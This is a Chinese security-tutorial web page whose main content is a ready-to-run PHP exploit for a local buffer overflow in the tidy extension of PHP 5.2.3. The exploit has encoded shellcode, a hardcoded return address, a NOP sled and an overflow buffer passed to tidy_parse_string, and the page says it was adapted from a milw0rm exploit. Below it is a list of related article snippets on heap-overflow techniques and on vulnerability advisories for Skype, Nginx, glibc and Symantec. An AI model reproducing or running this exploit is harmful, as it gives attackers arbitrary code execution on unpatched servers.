PHP 5.2.3 tidy扩展本地溢出漏洞利用代码_安全教程

复制代码 代码如下:

<?php 

if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");} 

$scode = 
"\xfc\xbb\xc7\xc4\x05\xc9\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85". 
"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x3b\x2c\x41\xc9\xc3\xad\xc1". 
"\x8c\xff\x26\xa9\x0b\x87\x39\xbd\x9f\x38\x22\xca\xff\xe6\x53\x27". 
"\xb6\x6d\x67\x3c\x48\x9f\xb9\x82\xd2\xf3\x3e\xc2\x91\x0c\xfe\x09". 
"\x54\x13\xc2\x65\x93\x28\x96\x5d\x58\x3b\xf3\x15\x3f\xe7\xfa\xc2". 
"\xa6\x6c\xf0\x5f\xac\x2d\x15\x61\x59\x5a\x39\xea\x9c\xb7\xcb\xb0". 
"\xba\x43\x0f\x79\x03\x2f\x04\x3a\xb3\x2a\xda\xc3\xbf\xbf\x9b\x3f". 
"\x4b\xcf\x07\xed\xc0\x47\x30\x06\xdf\x1c\xc0\x68\xe0\x22\xc1\x03". 
"\x89\x1e\x9e\x22\xbc\x3e\x76\xcc\xb8\x3d\xb6\xb5\x68\x29\xc7\xc0". 
"\x8d\xf6\x4f\x4d\x73\x82\x9e\x3a\x73\x75\xfd\xa9\xef\x57\x67\x4a". 
"\x95\x87\x48\xc9\x75\xa9\xf3\x79\x56\x40\x8f\xe4\xe4\x8a\x1d\x86". 
"\x71\xa2\xd5\x2b\xa2\x40\x77\xd5\xca\x90\x14\x05\x24\x99\x9e\x01". 
"\x1a\x3f\x39\xaa\x34\x5a\x31\x8a\xa4\xcb\xda\xab\x58\x74\x6f\x43". 
"\xd4\x0a\xaf\xda\x72\x87\xc6\xb2\x13\x24\x6d\x39\x85\xbe\xe2\xcf". 
"\x36\x1e\x8f\x4e\xc0\x36\x5b\xf2\x12\xe9\xe2\xb0\x16\xf5\xe4\x38". 
"\x97\xf5\xe4\x38\x97"; 

$EIP="\xD8\x69\x83\x7C";  
$NOP=str_repeat("\x90",12); 
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode; 
tidy_parse_string(1,$____buff,1); 
?> 

看了MILW0RM上的EXP稍微改了下,中

时间: 2024-07-31 19:34:38

PHP 5.2.3 tidy扩展本地溢出漏洞利用代码_安全教程的相关文章

无Sockets的远程溢出漏洞利用方法

本文讲的是无Sockets的远程溢出漏洞利用方法,在本文中,我将介绍一种在一个易受攻击的远程机器上获得shell访问的简单技术(这仅仅是我个人的观点).这不是我自己创造的技术,但我发现它很有趣.所以,本文的重点是这种技术本身,而不是利用漏洞的方式. 设置你的环境 所以,为了专注于制作远程shellcode,而不是如何规避ASLR,不可执行堆栈等(这将需要大量的篇幅进行介绍),我们将在测试中禁用大多数类似的功能.一旦你准备好了shellcode,便可以重新启用ASLR保护并尝试再次进行程序的漏洞利

Linux堆溢出漏洞利用之unlink

Linux堆溢出漏洞利用之unlink 作者:走位@阿里聚安全 0 前言 1 背景介绍 首先,存在漏洞的程序如下: 在代码[3]中存在一个堆溢出漏洞:如果用户输入的argv[1]的大小比first变量的666字节更大的话,那么输入的数据就有可能覆盖掉下一个chunk的chunk header--这可以导致任意代码执行.而攻击的核心思路就是利用glibc malloc的unlink机制. 上述程序的内存图如下所示: 2 unlink技术原理 2.1 基本知识介绍 unlink攻击技术就是利用"gl

SYMANTEC防火墙内核溢出漏洞利用之安全返回法

安全|防火墙 作者:SoBeIt   来自:https://www.xfocus.net 这个漏洞发生在SYMDNS.SYS中,当处理DNS答复时,由于未检验总域名长度,导致可以输入一超长域名导致溢出,溢出发生在RING0.IRQL = 2(DISPATCH_LEVEL). 进程PID为0(idle进程)的环境下.     一个DNS报文格式如下:    "\xEB\x0B"    //报文ID,可以随意设置,但在这个漏洞里是别有用途的,后面会说到    "\x80\x00&

chrome扩展学习 右键菜单实现代码_其它综合

manifest.json 复制代码 代码如下: { "name": "我的右键", "description": "chrome扩展学习---menu使用", "version": "0.1", "permissions": ["contextMenus", "tabs"], "background": {

Skype爆严重缓冲区溢出漏洞,可提权于无形之中

本文讲的是Skype爆严重缓冲区溢出漏洞,可提权于无形之中,近日,微软旗下非常流行的免费网络短信和语音呼叫服务Skype被发现了一个严重的漏洞,该漏洞可以让黑客远程执行恶意代码或者导致系统崩溃.  Skype是一种免费的在线服务,允许用户之间通过互联网进行语音,视频和即时消息进行通信.由于其在全球具有很高的知名度,该服务于2011年5月被微软公司以85亿美元收购.  这枚未知的堆栈缓冲区溢出漏洞(CVE-2017-9948)位于Skype Web的消息和通话服务中,该漏洞是来自德国based s

PHP 内存管理器符号比较多个溢出漏洞

受影响系统:PHP PHP 5.2.0 不受影响系统:PHP PHP 5.2.1 描述:BUGTRAQ ID: 23238 PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中.PHP的内存管理器实现上存在漏洞,本地攻击者可能利用此漏洞提升权限.如果通过emalloc()函数分配内存的话,PHP中新的Zend内存管理器会在内部的_zend_mm_alloc_int()函数中处理这个请求,首先使用ZEND_MM_TRUE_SIZE宏判断所请求内存块的真实大小,如下所示: s

绿盟科技网络安全威胁周报2017.28 关注Nginx远程整数溢出漏洞CVE-2017-7529

绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-28,绿盟科技漏洞库本周新增74条,其中高危53条.本次周报建议大家关注 Nginx 远程整数溢出漏洞 .目前厂商已经发布了升级补丁以修复这个安全问题,请到 厂商主页 下载更新. 焦点漏洞 Nginx 远程整数溢出漏洞 NSFOCUS ID  37146 CVE ID  CVE-2017-7529 受影响版本 Nginx Nginx 0.5.6-1.13.2 漏洞点评 Nginx是一款使用非常广泛的高性能web服务器.Nginx 0.5.

glibc gethostbyname 缓冲区溢出漏洞 修复建议

包括Linux不支持在线升级替换内核在内, 还有这个CASE, 还是不如AIX啊. http://www.ksyun.com/indexNotice/info/2015/2185.html#80b8ba67-599d-4f7d-a0e3-196dcc238f03 一.漏洞背景 代码审计公司Qualys的研究人员在glibc库中的__nss_hostname_digits_dots()函数中发现了一个缓冲区溢出的漏洞,这个bug可以经过gethostbyname*()函数被本地或者远程的触发. 1

绿盟科技网络安全威胁周报2017.01 请关注MatrixSSL堆缓冲区溢出漏洞CVE-2016-6890

绿盟科技发布了本周安全通告,周报编号NSFOCUS-16-39,绿盟科技漏洞库本周新增30条,其中高危9条.本次周报建议大家关注 MatrixSSL 堆缓冲区溢出漏洞 ,目前,此漏洞已经公布了一段时间并且官方已经进行了修复,强烈建议仍在使用受影响版本的用户进行升级. 焦点漏洞 MatrixSSL 堆缓冲区溢出漏洞 NSFOCUS ID  35726 CVE ID  CVE-2016-6890 受影响版本 3.8.5 漏洞点评 MatrixSSL是SSL/TLS的开源实现,主要应用于嵌入式系统中.